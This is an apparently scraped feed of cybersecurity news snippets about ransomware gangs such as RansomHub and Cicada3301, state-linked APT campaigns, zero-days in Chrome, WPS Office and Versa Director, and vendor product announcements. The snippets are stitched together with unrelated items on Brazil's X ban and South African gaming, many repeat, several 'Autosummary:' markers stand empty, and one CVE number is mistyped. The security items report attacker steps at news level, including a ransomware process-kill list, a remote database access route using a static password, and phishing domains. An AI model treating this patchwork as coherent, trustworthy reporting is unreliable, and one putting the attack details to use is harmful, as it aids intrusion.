During the second quarter, new ransomware groups, including PLAY, Medusa, RansomHub, INC Ransom, BlackSuit, and some additional lesser-known factions, led a series of attacks that eclipsed the first quarter of this year by 16% and the second quarter of 2023 by 8%, according to Corvus Insurance. "Autosummary:
The victims span various sectors, including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure. "Autosummary:
Key Takeaways from this Must-Attend Webinar: AI Innovations: Get an in-depth look at how AI is changing the face of vulnerability management. "Autosummary:
LockBit also claims to have re-breached Bridgestone Americas and claims Albany Bank, PKF Australia, HP Hood… pic.twitter.com/KBU9CtXbIs — Dominic Alvieri (@AlvieriD) August 29, 2024 At the end of July, two foreign nationals, Ruslan Magomedovich Astamirov and Mikhail Vasiliev, pleaded guilty in Newark federal court for their roles in the LockBit ransomware operation. "Autosummary:
Both are written in Rust Both use ChaCha20 for encryption Both use almost identical commands to shutdown VM and remove snapshots[1] Both use –ui command parameters to provide a graphic output on encryption Both use the same convention for naming files, but changing “RECOVER-“ransomware extension”-FILES.txt” to “RECOVER-“ransomware extension”-DATA.txt”[2] How the key parameter is used to decrypt the ransomware note The initial attack by the Cicada3301 group began with the use of stolen or brute-forced credentials to log in via ScreenConnect.A new variant of Cicada ransomware targets VMware ESXi systems Pierluigi Paganini September 02, 2024 September 02, 2024 A new ransomware-as-a-service (RaaS) operation called Cicada3301 has emerged in the threat landscape and already targeted tens of companies. "Autosummary:
Reacting to the decision to ban X, Mr Musk had earlier said: "Free speech is the bedrock of democracy and an unelected pseudo-judge in Brazil is destroying it for political purposes." "Autosummary:
Transport for London (TfL) is dealing with an ongoing cyberattack Pierluigi Paganini September 02, 2024 September 02, 2024 Transport for London (TfL) is investigating an ongoing cyberattack, however, customer information was compromised. "Autosummary:
“These days we’ve got a truly diverse cross section of South Africa coming to the event, all ages, races, and genders,” says rAge project director, Michael James.“Though on the surface things may seem to be moving slowly right now, when a lot of these new projects, teams, and companies reveal themselves, there is going to be a massive wave of South African content in the industry.” Carina Cristovao Rodwin Malinga sees a "massive wave" of South African games content coming As well as having a new wave of game developers, South Africa is a growing market for games themselves, points out Chris Beer, an analyst at GWI. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: SonicWall patches critical flaw affecting its firewalls (CVE-2024-40766) SonicWall has patched a critical vulnerability (CVE-2024-40766) in its next-gen firewalls that could allow remote attackers unauthorized access to resources and, in specific conditions, to crash the appliances. Nuclei: Open-source vulnerability scanner Nuclei is a fast and customizable open-source vulnerability scanner powered by YAML-based templates. APT group exploits WPS Office for Windows … More
The post Week in review: SonicWall critical firewalls flaw fixed, APT exploits WPS Office for Windows RCE appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: SonicWall patches critical flaw affecting its firewalls (CVE-2024-40766) SonicWall has patched a critical vulnerability (CVE-2024-40766) in its next-gen firewalls that could allow remote attackers unauthorized access to resources and, in specific conditions, to crash the appliances. Why ransomware attackers target Active Directory In this Help, Net Security video, Craig Birch, Technology Evangelist, and Principal Security Engineer at Cayosoft, discusses the rise of ransomware attacks, why attackers often target Microsoft Active Directory and best practices to limit the impact of such attacks. "Autosummary:
"Autosummary:
It should be noted that BlackCat/ALPHV encryptors also used random seven-character extensions and a ransom note named "RECOVER-[extension]-FILES.txt." Cicada3301 ransom note Source: BleepingComputer The ransomware"s operators can set a sleep parameter to delay the encryptor"s execution, potentially to evade immediate detection. Cicada3301 ransomware operator seeking affiliates on RAMP forums Source: Truesec Like other ransomware operations, Cicada3301 conducts double-extortion tactics where they breach corporate networks, steal data, and then encrypt devices. "Autosummary:
It should be noted that BlackCat/ALPHV encryptors also used random seven-character extensions and a ransom note named "RECOVER-[extension]-FILES.txt." Cicada3301 ransom note Source: BleepingComputer The ransomware"s operators can set a sleep parameter to delay the encryptor"s execution, potentially to evade immediate detection. Cicada3301 ransomware operator seeking affiliates on RAMP forums Source: Truesec Like other ransomware operations, Cicada3301 conducts double-extortion tactics where they breach corporate networks, steal data, and then encrypt devices. "Autosummary:
Microsoft, which detected the activity on August 19, 2024, attributed it to a threat actor it tracks as Citrine Sleet (formerly DEV-0139 and DEV-1222), which is also known as AppleJeus, Labyrinth Chollima, Nickel Academy, and UNC4736. "Autosummary:
North Korea-linked APT Citrine Sleet exploit Chrome zero-day to deliver FudModule rootkit Pierluigi Paganini August 31, 2024 August 31, 2024 North Korea-linked APT exploited the recently patched Google Chrome zero-day CVE-2024-7971 to deploy the FudModule rootkit. "Autosummary:
"Soon, we expect Judge Alexandre de Moraes will order X to be shut down in Brazil – simply because we would not comply with his illegal orders to censor his political opponents," the post said. "Autosummary:
The malware can also steal cryptocurrency wallets, private keys, and text files with names like seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt, *.txt, and *.pdf, as these are likely to contain private crypto keys and passwords. "Forescout’s 2024H1 Threat Review is a new report that reviews the current state of vulnerabilities, threat actors, and ransomware attacks in the first half of 2024 and compares them to H1 2023. “Attackers are looking for any weak point to breach IT, IoT, and OT devices, and organizations that don’t know what they have connected to their networks or if it’s secured are being caught flat-footed,” said Barry Mainz, Forescout CEO. “To mitigate these extensive … More
The post A macro look at the most pressing cybersecurity risks appeared first on Help Net Security.
"Autosummary:
"Accenture and Google Cloud announced that their strategic alliance is advancing solutions for enterprise clients and seeing strong momentum across industries in two critical and related areas: GenAI and cybersecurity. As part of the announcement today, the two companies are increasing their investments in services that support businesses through every stage of their GenAI projects, including providing the expertise to determine optimal use cases, piloting projects for strategic innovation and deploying the engineering prowess needed … More
The post Accenture expands partnership with Google Cloud to boost AI adoption and cybersecurity appeared first on Help Net Security.
"Autosummary:
Gabriel Ferreira, CEO, Banco BV, said, “The GenCore project, developed by Banco BV, Accenture, and Google Cloud, uses AI to create hyper-personalized interactions with customers, making communication 80% faster and 100 times more personalized. “Accenture’s decade-long partnership with Google Cloud is helping our clients across industries accelerate and scale their use of GenAI as a catalyst for reinvention, to strengthen cybersecurity, and create long-term value faster,” said Julie Sweet, CEO, Accenture. "Autosummary:
"These are the attacks that keep security CSOs, VP of Engineering and others responsible for ICS cyber defense, safety, and risk management, up at night," Parsons notes. "Autosummary:
The covert campaign, codenamed SLOW#TEMPEST and not attributed to any known threat actor, commences with malicious ZIP files that, when unpacked, activates the infection chain, leading to the deployment of the post-exploitation toolkit on compromised systems. "Autosummary:
"Autosummary:
Targeted sectors include insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations. "Autosummary:
"Autosummary:
Request to receive access token from Google Source: Proofpoint Voldemort uses Google"s API with an embedded client ID, secret, and refresh token to interact with Google Sheets, which are stored in its encrypted configuration. Abuse of Google Sheets Voldemort is a C-based backdoor that supports a wide range of commands and file management actions, including exfiltration, introducing new payloads into the system, and file deletion. "Autosummary:
"In early June, Gen Threat Labs identified Diamond Sleet exploiting this vulnerability in an attack employing the FudModule rootkit, which establishes full standard user-to-kernel access, advancing from the previously seen admin-to-kernel access. "Autosummary:
On the same day, Rhysida ransomware claimed responsibility for the attack, alleging they stole 6.5 TB of databases, including employee credentials, server dumps, city video camera feeds, and other sensitive information. "Autosummary:
Other names for this group—depending on the vendor– are APT42, Storm-2035, Charming Kitten, Damselfly, Mint Sandstorm, TA453, and Yellow Garuda. "Autosummary:
South Korea-linked group APT-C-60 exploited a WPS Office zero-day Pierluigi Paganini August 30, 2024 August 30, 2024 South Korea-linked group APT-C-60 exploited a zero-day in the Windows version of WPS Office to target East Asian countries. "Autosummary:
Threat actors exploit Atlassian Confluence bug in cryptomining campaigns Pierluigi Paganini August 30, 2024 August 30, 2024 Threat actors are actively exploiting a critical flaw in the Atlassian Confluence Data Center and Confluence Server in cryptocurrency mining campaigns. "Autosummary:
Google TAG (Threat Analysis Group) researchers observed the Russia-linked group APT29 (aka SVR group, BlueBravo, Cozy Bear, Nobelium, Midnight Blizzard, and The Dukes).In July 2024, the site mfa.gov.mn was compromised a third time, redirecting Android Chrome users to track-adv.com to exploit CVE-2024-5274 and CVE-2024-4671, deploying a Chrome information-stealing payload. "Autosummary:
"Ransomware attacks have surged 78% year-over-year, affecting various sectors and organizations and significantly impacting supply chains. In this Help, Net Security video, Craig Birch, Technology Evangelist, and Principal Security Engineer at Cayosoft, discusses the rise of ransomware attacks, why attackers often target Microsoft Active Directory and best practices to limit the impact of such attacks. Microsoft Active Directory, the core identity and access system in over 90% of enterprises, has become a prime target for … More
The post Why ransomware attackers target Active Directory appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"RISCPoint Advisory Group launched RADAR, an all-in-one cybersecurity platform. Combining continuous threat discovery with expert-led Penetration Testing as a Service (PTaaS), RADAR represents a significant leap forward in proactive security and risk management. RADAR leverages artificial intelligence to provide real-time vulnerability detection across multiple attack surfaces. The platform offers continuous scanning and on-demand penetration testing by certified ethical hackers, ensuring comprehensive security assessments and compliance reporting. “With the ever-evolving threat landscape and continued focus on … More
The post RISCPoint RADAR provides real-time vulnerability detection across multiple attack surfaces appeared first on Help Net Security.
"Autosummary:
"Autosummary:
In 2021, the Russian cyber-operatives exploited CVE-2021-1879 as a zero-day, targeting government officials in Eastern Europe, attempting to deliver a cookie-stealing framework that snatched LinkedIn, Gmail, and Facebook accounts. "Autosummary:
"Suspected Russian hackers have been hitting iPhone and Android users visiting government websites with exploits first leveraged by commercial surveillance vendors, Google TAG researchers shared. The watering hole campaigns Between November 2023 and July 2024, threat actors have repeatedly compromised the websites of the Mongolian Cabinet Secretariat (cabinet.gov[.]mn) and the country’s Ministry of Foreign Affairs (mfa.gov[.]mn) to serve iframes or JavaScript delivering an exploit or exploit chain. The threat actors leveraged Intellexa’s CVE-2023-41993 (WebKit) exploit … More
The post Midnight Blizzard delivered iOS, Chrome exploits via compromised government websites appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Initial access is accomplished by taking advantage of remote external services on internet-facing assets that are vulnerable to previously disclosed flaws (CVE-2019-19781, CVE-2022-1388, CVE-2023-3519, CVE-2024-3400, and CVE-2024-24919), followed by a series of steps to persist, escalate privileges, and set up remote access through tools like AnyDesk or the open-source Ligolo tunneling tool. Peach Sandstorm Delivers Tickler Malware in Long-Running Campaign The development comes as Microsoft said it observed Iranian state-sponsored threat actor Peach Sandstorm (aka APT33, Curious Serpens, Elfin, and Refined Kitten) deploying a new custom multi-stage backdoor referred to as Tickler in attacks against targets in the satellite, communications equipment, oil and gas, as well as federal and state government sectors in the U.S. and U.A.E. between April and July 2024. "Autosummary:
The flaw, discovered by Akamai"s Aline Eliovich, is tracked as CVE-2024-7029 and is a high-severity (CVSS v4 score: 8.7) issue in the "brightness" function of the cameras, allowing unauthenticated attackers to inject commands over the network using specially crafted requests. "Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. These have been identified through FBI threat response activities and third-party reporting as recently as August 2024. RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV).
Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.
The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. It should be noted that data exfiltration methods are dependent on the affiliate conducting "
Autosummary:
To successfully encrypt files that are currently in use, the ransomware binary will typically attempt to stop the following processes: "vmms.exe" "msaccess.exe" "mspub.exe" "svchost.exe" "vmcompute.exe" "notepad.exe" "ocautoupds.exe" "ocomm.exe" "ocssd.exe" "oracle.exe" "onenote.exe" "outlook.exe" "powerpnt.exe" "explorer.exe" "sql.exe" "steam.exe" "synctime.exe" "vmwp.exe" "thebat.exe" "thunderbird.exe" "visio.exe" "winword.exe" "wordpad.exe" "xfssvccon.exe" "TeamViewer.exe" "agntsvc.exe" "dbsnmp.exe" "dbeng50.exe" "encsvc.exe" The ransomware binary will attempt to encrypt any files that the user has access to, including user files and networked shares. Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.Data exfiltration has been observed through the usage of tools such as PuTTY [T1048.002], Amazon AWS S3 buckets/tools [T1537], HTTP POST requests [T1048.003], WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. "Autosummary:
"Autosummary:
"Autosummary:
CVE-2024-4671 - A use-after-free flaw in Chrome"s Visuals component that could result in arbitrary code execution (Fixed by Google in Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux in May 2024) CVE-2024-5274 - A type confusion flaw in the V8 JavaScript and WebAssembly engine that could result in arbitrary code execution (Fixed by Google in Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux in May 2024) The November 2023 and February 2024 campaigns are said to have involved the compromises of the two Mongolian government websites – both in the first and only mfa.gov[.]mn in the latter – to deliver an exploit for CVE-2023-41993 by means of a malicious iframe component pointing to an actor-controlled domain. "Autosummary:
But, we only really need to look at what recent high-profile breaches show us about how lucrative it can be for attackers to find ways to take over workforce identities in order to access web-based business applications – with the recent Snowflake attacks, going down as one of the biggest breaches in history, being the elephant in the room. Attackers are bypassing existing controls with ease Existing phishing prevention solutions have tried to solve the problem by protecting the email inbox, a common (but not the only) attack vector, and blocking lists of known-bad domains.Attackers are increasingly using new phishing toolkits (open-source, commercial, and criminal) to execute adversary-in-the-middle (AitM) attacks. And even if they are reported, it"s trivial for attackers to obfuscate or change these components: You could look for known-bad URLs in emails, but these change for every phishing campaign. In this article, we"re going to look at what AitM phishing is, how it works, and what organizations need to be able to detect and block these attacks effectively. AitM enables attackers to not just harvest credentials but steal live sessions, allowing them to bypass traditional phishing prevention controls such as MFA, EDR, and email content filtering. AitM and BitM attack and detection demo Check out the video below to see a demonstration of the Evilginx and EvilNoVNC phishing toolkits in action, as well as how browser-based security controls can be used to detect and block them before the phishing attack is completed. "Autosummary:
CVE-2024-7029 (CVSS score: 8.7), the vulnerability in question, is a "command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) cameras that allows for remote code execution (RCE)," Akamai researchers Kyle Lefton, Larry Cashdollar, and Aline Eliovich said. "Autosummary:
"As soon as we learned of the issue, we activated our cybersecurity response plan and took steps to address it, including (1) proactively taking certain systems offline to help protect them, (2) engaging the support of leading external advisors, including Mandiant, and (3) notifying law enforcement. However, soon after, it was discovered that the operation also utilized ransomware encryptors in its double-extortion attacks, where the threat actors breached networks, stole data, and then encrypted files. "Autosummary:
"Autosummary:
Akamai’s Security Intelligence and Response Team (SIRT) has detected a botnet campaign exploiting multiple previously known vulnerabilities and a newly discovered zero-day, tracked as CVE-2024-7029 (CVSS score: 8.7), in AVTECH CCTV cameras. "Autosummary:
Microsoft researchers reported that the Iran-linked cyberespionage group APT33 (aka Peach Sandstorm, Holmium, Elfin, Refined Kitten, and Magic Hound) used new custom multi-stage backdoor called Tickler to compromise organizations in sectors such as government, defense, satellite, oil, and gas in the U.S. and UAE. "Autosummary:
At the time, Sancho, now 30, told Spanish news agency EFE he had been a "hostage" to Arrieta, who he said was obsessed with him. "Autosummary:
"Autosummary:
"Business Information Security Officer Toyota North America | USA | On-site – View job details Acting as an Information Security ambassador to the business, this role works with technology, data, risk, business, and the larger TFS Information Security team to provide relationship-based security services to the business, promote secure designs, and manage the execution of security testing and remediation. Cyber Security Consultant WithSecure | UK | On-site – View job details The ideal candidate will … More
The post Cybersecurity jobs available right now: August 28, 2024 appeared first on Help Net Security.
"Autosummary:
Business Information Security Officer Toyota North America | USA | On-site – View job details Acting as an Information Security ambassador to the business, this role works with technology, data, risk, business, and the larger TFS Information Security team to provide relationship-based security services to the business, promote secure designs, and manage the execution of security testing and remediation. "Cybercriminals are capitalizing on the travel and hospitality industry’s peak season, using increased traffic as cover for their attacks, according to Cequence Security. Researchers investigated the top 10 travel and hospitality sites to identify externally visible edge, cloud infrastructure, application stack, API hosts, and security vulnerabilities. Threat researchers observed a consistent pattern across industries: increased website traffic during peak seasons, like the travel and hospitality industry’s vacation and holiday periods, coincides with a surge in … More
The post Cybercriminals capitalize on travel industry’s peak season appeared first on Help Net Security.
"Autosummary:
Researchers investigated the top 10 travel and hospitality sites to identify externally visible edge, cloud infrastructure, application stack, API hosts, and security vulnerabilities. "Autosummary:
"ESET researchers discovered a remote code execution vulnerability in WPS Office for Windows (CVE-2024-7262). APT-C-60, a South Korea-aligned cyberespionage group, was exploiting it to target East Asian countries. When examining the root cause, ESET discovered another way to exploit the faulty code (CVE-2924-7263). Overview of the exploit’s control flow (Source: ESET) Following a coordinated disclosure process, both vulnerabilities are now patched. The final payload in the APT-C-60 attack is a custom backdoor with cyberespionage capabilities … More
The post APT group exploits WPS Office for Windows RCE vulnerability (CVE-2024-7262) appeared first on Help Net Security.
"Autosummary:
The WPS Office software has over 500 million active users worldwide, which makes it a good target to reach a substantial number of individuals, particularly in the East Asia region,” says ESET researcher Romain Dumont, who analyzed the vulnerabilities. "Organizations using Fortra’s FileCatalyst Workflow are urged to upgrade their instances, so that attackers can’t access an internal HSQL database by exploiting known static credentials (CVE-2024-6633). “Once logged in to the HSQLDB, the attacker can perform malicious operations in the database. For example, the attacker can add an admin-level user in the DOCTERA_USERS table, allowing access to the Workflow web application as an admin user,” Tenable researchers discovered. Two flaws fixed Fortra FileCatalyst Workflow is … More
The post Critical Fortra FileCatalyst Workflow vulnerability patched (CVE-2024-6633) appeared first on Help Net Security.
"Autosummary:
Following the steps outlined in the vendor KB article but using a remote JDBC URL (i.e., jdbc:hsqldb:hsql:// :4406/hsqldb), unauthenticated, remote attackers may access the database by leveraging the documented static password. "Autosummary:
"Autosummary:
In April 2020, Group-IB detailed a campaign dubbed PerSwaysion that successfully compromised corporate email accounts of at least 156 high-ranking officers at various firms based in Germany, the U.K., the Netherlands, Hong Kong, and Singapore by using Sway as the jumping board to redirect victims to credential harvesting sites. "Dragos announced the latest release of the Dragos Platform, an OT network visibility and cybersecurity platform. The updates provide industrial and critical infrastructure organizations with even deeper and enriched visibility into all assets in their OT environments, streamlined workflows for threat detection and vulnerability management that allow for efficient and effective response, and powerful integration of Dragos WorldView intelligence and Neighborhood Keeper community intelligence on current and emerging threats. Industrial organizations worldwide are grappling with … More
The post Dragos Platform updates streamline OT threat and vulnerability workflows appeared first on Help Net Security.
"Autosummary:
As threats to OT environments continue to evolve, Dragos remains at the forefront of OT-specific threat detection: Over 1,000 new threat detections, vulnerabilities and response playbooks added: The latest updates introduce over 1,000 new threat detections, addressing emerging threats such as CyberAveng3rs, FrostyGoop and other advanced threats. The evolved integration of the Platform with Dragos’s Neighborhood Keeper and WorldView threat intelligence streamlines vulnerability management, threat detection, and response workflows to meet emerging threats like FrostyGoop and PIPEDREAM malware; Unitronics vulnerabilities; and VOLTZITE, CyberAveng3rs, and CHERNOVITE threat groups targeting OT environments. "Autosummary:
A majority of the attacks have targeted healthcare, finance, and government sectors in the U.S., Brazil, Italy, Spain, and the U.K. "For initial access the affiliates usually purchase compromised valid domain accounts from Initial Access Brokers (IABs) and external remote services," Group-IB said, adding the "accounts have been acquired via LummaC2 stealer.All the four drivers follow a similar naming convention: Eight random alphanumeric characters followed by an underscore and an incremental numerical value - AM35W2PH (RtCore64.sys) AM35W2PH_1 (DBUtil_2_3.sys) AM35W2PH_2 (zamguard64.sys aka Terminator) AM35W2PH_3 (gdrv.sys) The professional, scientific, and technical services sectors have the greatest exposure to the observed vulnerable drivers, accounting for 15% of the total, followed by manufacturing (13%) and educational services (13%). "Autosummary:
"Autosummary:
"Autosummary:
"On August 21, 2024, the Company discovered unauthorized third-party access to its information systems, including portions of its systems containing certain confidential information," the retailer giant said. "A group of Iranian hackers – dubbed Pioneer Kitten by cybersecurity researchers – is straddling the line between state-contracted cyber espionage group and initial access provider (and partner in crime) for affiliates of several ransomware groups. “The FBI assesses these actors do not disclose their Iran-based location to their ransomware affiliate contacts and are intentionally vague as to their nationality and origin,” US security agencies say. Also, “the group’s ransomware activities are likely not sanctioned … More
The post Pioneer Kitten: Iranian hackers partnering with ransomware affiliates appeared first on Help Net Security.
"Autosummary:
Iranian hackers working with ransomware affiliates Pioneer Kitten – also known as Fox Kitten, UNC757, Parisite, RUBIDIUM, and Lemon Sandstorm in the cybersecurity research community – is an group that refers to itself as “xplfinder” and, more recently “Br0k3r”. "Diligent launched its Network and Information Security Directive (NIS2) Compliance Toolkit, designed to help organizations navigate the complexities of the European Union (EU) NIS2 Directive and bolster their cybersecurity resilience. The toolkit maps cybersecurity risk management obligations mandated by NIS2 against Cyber Risk Management Group’s (CRMG) leading controls library, which is based on international standards and best practices. This helps organizations demonstrate a clear commitment to NIS2 compliance requirements to drive trust with customers, partners, … More
The post Diligent NIS2 Compliance Toolkit helps organizations bolster their cybersecurity resilience appeared first on Help Net Security.
"Autosummary:
Powered by CRMG’s leading controls library, Diligent’s NIS2 Compliance Toolkit aligns mandated NIS2 cybersecurity measures with international standards, and provides tailored content to help organizations implement new boardroom accountability, mandatory cybersecurity measures, and incident reporting requirements. "Autosummary:
"Autosummary:
Specifically, the file comes embedded with a malicious link that, when clicked, triggers a multi-stage infection sequence to deliver the SpyGlace trojan, a DLL file named TaskControler.dll that comes with file stealing, plugin loading, and command execution capabilities. "Autosummary:
"Autosummary:
"Autosummary:
"On August 21, 2024, the Company discovered unauthorized third-party access to its information systems, including portions of its systems containing certain confidential information," the retailer giant said. "Autosummary:
The Qilin ransomware group listed CODAC Behavioral Healthcare Within the stolen data, Malwarebytes Labs noticed financial information, pictures of ID cards, a list of staff members—including their Social Security Numbers (SSNs)—and healthcare cards. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Hunters International ransomware group posted 386 GB of data that appears to include files on gangs, documents from the FBI, specific case information, operational data, and more. "Autosummary:
Bad patch leaves gap While investigating APT-C-60"s attacks, ESET"s researchers discovered CVE-2024-7263, a second arbitrary code execution flaw impacting WPS Office, which emerged as an incomplete patch of CVE-2024-7262. "Autosummary:
U.S. CISA adds Google Chromium V8 bug to its Known Exploited Vulnerabilities catalog Pierluigi Paganini August 28, 2024 August 28, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chromium V8 bug to its Known Exploited Vulnerabilities catalog. "Autosummary:
The ransomware gang claimed the theft of the following information: Business data (contracts, contacts, planning, presentations, etc) Employee data (passports, contracts, contacts, family details, medical examinations, etc) Financial data (audits, reports, payments, contracts, etc) other data taken from shares and personal folders The group added that top management completely refused to negotiate thinking that they were bluffing. "Autosummary:
The group has been active since at least 2021, BlackByte is known for using vulnerable drivers to bypass security, deploying self-propagating ransomware with worm-like abilities, and leveraging legitimate system binaries and commercial tools in its attacks.BlackByte Ransomware group targets recently patched VMware ESXi flaw CVE-2024-37085 Pierluigi Paganini August 28, 2024 August 28, 2024 BlackByte ransomware operators are exploiting a recently patched VMware ESXi hypervisors vulnerability in recent attacks. "Autosummary:
“Kadariya and his associates used multiple strategies to profit from their widespread hacking and wire fraud scheme, including by using accounts on predominantly Russian cybercrime forums to sell to cybercriminals access to the compromised devices of victim Internet users (so-called “loads” or “bots”), as well as information stolen from victims and recorded in “logs,” such as banking information and login credentials, to enable further efforts to defraud the victim Internet users or deliver additional malware to their devices.” "Autosummary:
It is used by hundreds of companies worldwide, with 41% in the U.S., 19% in India, 7% in Germany, 6% in France, and 5% in the U.K. Notable users include United Airlines, Atlassian JIRA, Home Depot, and HP. "44% of unfolding ransomware attacks were spotted during lateral movement, according to Barracuda Networks. 25% of incidents were detected when the attackers started writing or editing files, and 14% were unmasked by behavior that didn’t fit with known activity patterns. Barracuda researchers analyzed a sample of 200 reported incidents covering August 2023 to July 2024, involving 37 countries and 36 different ransomware groups. RaaS models most common in recent ransomware attacks The sample shows that … More
The post Lateral movement: Clearest sign of unfolding ransomware attack appeared first on Help Net Security.
"Autosummary:
Leading indicators of ransomware activity According to detection data from Barracuda, in the first six months of 2024 the top indicators of likely ransomware activity include: Lateral movement : 44% of the ransomware attacks were spotted by detection systems monitoring for lateral movement. "Autosummary:
CVE-2024-4671 - Use-after-free in Visuals - Use-after-free in Visuals CVE-2024-4761 - Out-of-bounds write in V8 - Out-of-bounds write in V8 CVE-2024-4947 - Type confusion in V8 - Type confusion in V8 CVE-2024-5274 - Type confusion in V8 - Type confusion in V8 CVE-2024-7971 - Type confusion in V8 Users are highly recommended to upgrade to Chrome version 128.0.6613.84/.85 for Windows and macOS, and version 128.0.6613.84 for Linux to mitigate potential threats. "Autosummary:
"Autosummary:
The firm, which also offers shuttle, car washing, and oil change services, operates facilities located near airports in Toronto, Vancouver, Montreal, Edmonton, and Ottawa. "Autosummary:
"Analysis of our global telemetry identified actor-controlled small-office/home-office (SOHO) devices exploiting this zero-day vulnerability at four U.S. victims and one non-U.S. victim in the Internet service provider (ISP), managed service provider (MSP) and information technology (IT) sectors as early as June 12, 2024," explained Black Lotus Labs. Versa confirmed this to BleepingComputer, explaining that the threat actors exploited the vulnerability to steal credentials using these steps: Access the exposed HA port using an NCS client and create an account with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin privileges. "Autosummary:
"Autosummary:
Involved domains myturnpiketollservices[.]com nytollservices.com tollsinfosny[.]com tollsinfonyc[.]com bayareafastraktollservices[.]com intollroadacc219[.]com toll-sunpass[.]com tollnyezpassweb[.]com indiana260roadtollac[.]com inweb-tollroadtrust[.]com in-tollroadgouv1[.]com newyorktollroadtrust1[.]com nyserviceezpass[.]com intrust-tollroadweb[.]com sunspass[.]com sunspasstollsservices[.]com sunpasstollservices[.]com tollsbymailsny[.]com Several of these were hosted at the IP: 45.8.92[.]38 We don’t just report on phone security—we provide it Cybersecurity risks should never spread beyond a headline. "Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Since then it has gone through several mergers and acquisitions According to the data breach notification, the breach occurred on May 29, 2023, but wasn’t discovered until July 30, 2024.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Advanced, persistent attackers have exploited a zero-day vulnerability (CVE-2024-39717) in Versa Director to compromise US-based managed service providers with a custom-made web shell dubbed VersaMem by the researchers. The malware harvests credentials enabling the attackers to access the providers’ downstream customers’ networks as an authenticated user. “Based on known and observed tactics and techniques, [Lumen’s] Black Lotus Labs attributes the zero-day exploitation of CVE-2024-39717 and operational use of the VersaMem web shell with moderate confidence … More
The post Versa Director zero-day exploited to compromise ISPs, MSPs (CVE-2024-39717) appeared first on Help Net Security.
"Autosummary:
The attacks On Tuesday, Black Lotus Labs researchers shared that they identified actor-controlled small-office/home-office (SOHO) devices exploiting the zero-day at four US victims and one non-US victim in the ISP / MSP / IT sectors as early as June 12, 2024. "RSA announced new passwordless, phishing-resistant capabilities that meet stringent technical standards and can help public sector agencies, contractors, and systems integrators fulfill Executive Order 14028 and National Security Memo 8 to improve the nation’s cybersecurity. The RSA Authenticator App is FIDO2-certified and now supports device-bound passkeys that comply with the strictest federal cybersecurity regulations. Part of RSA ID Plus, an identity and access management (IAM) platform built on NIST principles, RSA can provide the authentication … More
The post RSA Authenticator App improves cybersecurity for federal agencies appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The Santa Clara-based company counts Adobe, Axis Bank, Barclays, Capital One, Colt Technology Services, Infosys, Orange, Samsung, T-Mobile, and Verizon among its customers. "Autosummary:
"Autosummary:
"Autosummary:
ESET says that the same malicious server, which has been taken down now, hosted additional plugins named OMEMO, Pidgin Paranoia, Master Password, Window Merge, and HTTP File Upload. "Autosummary:
However, the takeaway from all this is that you should always keep your devices updated, and when that is not possible, try to dispose of them securely (wiping old data), replace them with a new device after secure disposal, or find them a new, much-less-connected purpose.Devices such as cameras, teleconferencing systems, routers, and smart locks have operating systems or firmware that, once obsolete, no longer receive security updates, leaving the door open to hacking or other misuse. "Autosummary:
